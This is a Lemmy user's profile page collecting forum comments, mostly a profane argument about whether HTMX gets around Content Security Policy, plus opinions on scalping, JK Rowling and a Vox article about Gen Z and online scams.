Jon Stewart is back on The Daily Show
rwhitisissle @ rwhitisissle @lemmy.world Posts 0Comments 189Joined 2 yr. ago
rwhitisissle @ rwhitisissle @lemmy.world
Posts
0
Comments
189
Joined
2 yr. ago
It's also dated 4/20. I'm amazed they didn't manage to sneak a 69 in there somewhere to get the full meme potential out of it.
picture of handwritten note taped to a window that criticizes Gen Z and praises Baby Boomers.
I'm not the brightest cookie in the toolshed but I know bait when I see it.
Edit: The top left hand corner of this is also dated 4/20. As the Brits would say "Someone's taking the piss."
Oh boy a semantic argument
It turns out the language you use can be semantically ambiguous or misleading if you phrase it incorrectly. Today you learned.
And any web dev who remotely understands the point of CSP and why it was created, should instantly have alarm bells going off at the concept of triggering arbitrary ajax via html attributes.
Oh, did you finally manage to fucking Google how HTMX works so you could fish for more reasons to say it's unsafe? What you're describing is not a particular concern to HTMX. If an attacker can inject HTML into your page (for example, through an XSS vulnerability), they could potentially set up HTMX attributes to make requests to any endpoint, including endpoints designed to collect sensitive information. But, and this is very important, this is not a unique issue to HTMX; it's a general security concern related to XSS vulnerabilities and improper CSP configurations.
Do you know what the correct cure for that is?
PROPER CSP CONFIGURATION.
“HTMX doesn’t bypass CSP! It just (proceeds to describe the exact mechanism by which it bypasses CSP)”
Do you genuinely not understand that CSP works on the browser API level? It doesn't check to see if your JavaScript contains reference to disallowed endpoints and then prevents it from running. I don't know how you "think" CSP operates, but what happens is this: The browser exposes an API to allow JavaScript to make HTTP requests - specifically XMLHttpRequest and fetch(). What CSP does is tell the browser "Hey, if you get an API request via XMLHttpRequest or fetch to a disallowed endpoint, don't fucking issue it." That's it. HTMX does not magically bypass the underlying CSP mechanism, because those directives operate on a level beyond HTMX's (or any JS library's) influence BY DESIGN. You cannot bypass if it if's properly configured. Two very serious questions: what part of this is confusing to you? And, have you ever tested this yourself in any capacity to even see if what you're claiming is even true? Because I have tested it and CSP will block ANY HTMX issued request that is not allowed by CSP's connect-src directive, assuming that's set.
CSP works on the browser API level - all HTMX does is what you could do yourself with any AJAX: send an HTTP request to an endpoint. If the CSP disallows that endpoint, it will fail.
Just to be clear, are you talking about some kind of templating library that literally transpiles all the htmx logic and instead packs it into individual ajax logic in js files “per element”, such that you don’t need to serve htmx client side and instead you pre-transpile all the ajax logic out to separate files?
My brother in Christ, what the fuck are you talking about "transpiling HTMX" and "serving HTMX client side?" You don't "serve" HTMX and there's nothing to "transpile into JavaScript." It is JavaScript. That's like saying you "serve React client side" and "transpile JavaScript into more JavaScript." Jesus, I feel like I'm taking crazy pills.
Cause the very start of my statements was that if we had something like that then HTMX would be fine, as a templating lib that transpiled out to html+js.
Oh, okay, so you don't actually know what HTMX is or how it works, then? Because HTMX (https://htmx.org/) is a JavaScript library. Like, literally just a JavaScript library. It's like....4000 lines of JavaScript. In fact you can read the source code for it here: https://github.com/bigskysoftware/htmx/blob/master/src/htmx.js. For some...insane reason you seem to think HTMX is its own language. It's not. It's...just a JavaScript library. There is no other language called HTMX. There is no other mechanism or tool called HTMX. No implementation or protocol or ANYTHING else. It's just a small JavaScript library.
invoke arbitrary logic with html attributes
Once again, HTMX enhances HTML with various attributes declaratively. It utilizes custom data attributes in HTML (like hx-get, hx-post) to specify how elements on the page should behave - essentially, how and where to fetch data or submit forms without a full page reload. This is a form of declarative programming that tells the htmx.js library (which is just doing fucking AJAX) what to do when certain events occur (e.g., a click or a form submission). The actions (like the actual requesting of data from an endpoint) are performed by the code in htmx.js.
This is a fancy way of saying "if you stick an hx-get attribute on a button, then you can just say where you want a GET request to go to and what element you want updated with the HTML returned from it and htmx.js will parse that out on page load and set an event listener for the button click to know when to initiate an AJAX request to the defined endpoint." If you had an hx-get attribute in an element in a page and that page didn't have the htmx.js library loaded it would do literally nothing.
And, once again, HTMX, being a JavaScript library, operates under the same security constraints as any JavaScript executed in the browser. This means that:
- HTMX's scripts themselves must be loaded from sources allowed by the script-src CSP directive.
- Any dynamic requests to load content or submit data initiated by HTMX are subject to CSP's connect-src directive.
HTMX enables arbitrary invocation of ANY api endpoint with cookies included, through html attributes, which inherently can’t be covered by Content Security Policy
I want you to please explain how HTMX bypasses the Content Security Policy connect-src directive, or any -src directive, for that matter, assuming it is specified (which it should be). Because I'm genuinely curious why the HTMX dev team would include a section on CSP in their docs if it did literally nothing, as you say.
Actually, as an even more basic question...you do know that HTMX is literally just an AJAX library, right? It doesn't actually "do" anything via HTML attributes. The additional HTMX attributes, like hx-get, hx-post, etc. just tells HTMX where and how to make the API requests. These requests are executed by the browser's native fetch or XMLHttpRequest APIs, depending on compatibility and implementation. Therefore, HTMX is subject to the same security constraints and policies as any other JavaScript-based operation that makes HTTP requests. Which also, by definition, means that it adheres to the Content Security Policy directives configured for that website.
In other words, an HTML button element with hx-get="https://www.some-endpoint.com/" on it would eventually translate into
const xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.some-endpoint.com/");
xhr.send();
on click.
You do understand that, right?
Black goes with everything and hides stains better than lighter colors.
Don't forget the programmers! (teledildonics)
"Billionaire has shitty beliefs. In other news, the weather in London is still complete ass."
The preferred term is NaMP - Not a Magical Person/Non-Magical Person. You could also say "Person of Non-Magic," but it's hard to pronounce "ponm."
number puzzles that need to be solved.
In JK Rowling's mind the number puzzles are things like "How many genders are there?"
The correct answer, of course, is "Fuck you, JK Rowling, that's how many."
Remember when shootings were so rare that a shooting happening one time at one place was enough to spawn a lasting phrase in American English? Simply fascinating how the times have changed.
I'm actually a huge fan of scalping and hope it happens more. Here's why: many of your more dim-witted, more or less middle-class "free market" bros will gladly tell you that the value of a good is set by supply and demand. Hospital care is so expensive because there are comparatively few doctors, MRI machines, etc. in comparison with the entire population. Houses are so expensive because everyone wants a house and it's an appreciable asset. I've seen these people my entire life. They'll decry socialism and make the age old joke that "socialism is when no potato." But the second a PS5 gets a street price of 700 bucks, suddenly they become walking "Homer Simpson fading into the hedge and coming back out wearing a different outfit" memes. They'll say things like "scalping should be illegal" or "the government should step in to make sure that the actual consumers who want one can get one - nobody should be allowed to buy 500 of them and just sit on them forever." Suddenly, market economics produces a state of inequality that doesn't directly benefit them, and the guiding hand of the government should be used to ensure equitable distribution of resources. Not that they'd ever reflect on this in any way or consider how their personal experiences indicates a larger set of structural problems with the economic systems that produce such a state of affairs.
the use of exciting or shocking stories or language at the expense of accuracy.
What part of this article is inaccurate?
You can say the title is clickbait, but that doesn't make it sensationalist. I feel like either you and I have totally different definitions of sensationalist, or you think the article is doing something it's not. The article does the following
- Introduce a surprising fact: Zoomers fall for online scams more than Boomers do. This is surprising because a) Zoomers are online so much and would be expected to be innately familiar with such things and b) online scammers famously target the elderly, so much so that Boomers are almost stereotyped as being the victims of internet scams.
- Add supporting details and discuss the source of the facts being discussed - specifically it introduces the Deloitte study, a 2023 report by Social Catfish, and the academic article I linked in my previous comment. These all help provide the concrete, factual basis for the article.
- Highlights important findings from these sources that explains this phenomenon, including the centrality of mobile devices to the lives of Zoomers, how many popular apps have no real safeguards against predatory users or advertisers, and cultural or societal trends that might influence how Zoomers perceive their interactions with others on the internet.
- Discusses how Zoomers can better protect themselves online and how, one can infer from the article, an adult or guardian could help Zoomers stay safe on the internet - such as by enabling safer settings or utilizing alternative browsers and ad blockers (things Zoomers might not innately think to do or know about), while also addressing some of the failures of large corporations and app developers to safeguard their users.
I'd like to know what part of that is sensationalist to you, because in my mind that is a remarkably by the numbers tech article.
Also, the data itself is not "BS" - it's something that is accurate, but has to be understood within a specific context. That's literally what the article is doing - contextualizing the information. You are saying it's sensationalizing the data. It's not. If anything it's doing the opposite. It's making the data more mundane by providing logical explanations for it.
I know people who teach high school and they say that Gen Z has both an extreme degree of personal esteem and that they won't take shit from anyone who disparages who they fundamentally are as people (like people giving shit for them being from immigrant families, being POCs, being LGBT, etc.), which is fantastic - no one should ever put up with shit like that. But they also seem to have a very hard time organizing their thoughts and making logical conclusions from structured evidence. Like they can't write a paper making an argument for something and providing evidence for why something is a certain way. It's all stream of consciousness. I think that as a generational cohort they might be more inclined towards "unstructured thought" or perhaps "stream of consciousness" than other generations. As old as I might sound because of this opinion, I do think that the fact that they interact with information almost entirely through mobile devices is a potential component of that. The mechanisms and mediums by which you consume information arguably shape how you process information.
So you agree the article is sensationalist?
The article is not sensationalist. Please quote me a part of the article that you feel is and I can address the statements that make you feel that way.
Why link me a study that is irrelevant for no reason?
Because that study is referenced as one of the primary sources the article uses to provide evidence for the phenomenon it discusses. The link to that research paper is literally in the article. It's critical to the article.
Yes, they acknowledge that as well when they discuss the sample population. Baby Boomers are literally not a part of it. The title of the Vox article is just drawn from a Deloitte industry survey. Which has no real context or judgment around it - it's purely a reporting of aggregate statistics. The Vox article just attempts to explain why Zoomers, a generational cohort that grew up with the internet, might be more statistically prevalent for succumbing to those scams compared to Baby Boomers, who were fully adult when the internet became widespread. The superficial presumption is that you would expect the opposite - the older generations have little to no familiarity with modern technology and are more easily victimized by it. That presumption is all the Vox article is discussing, really, and why it's probably not correct.
Somehow, irrespective of indicating any kind of actual political ideology, this is the most liberal comment I have ever read on the internet.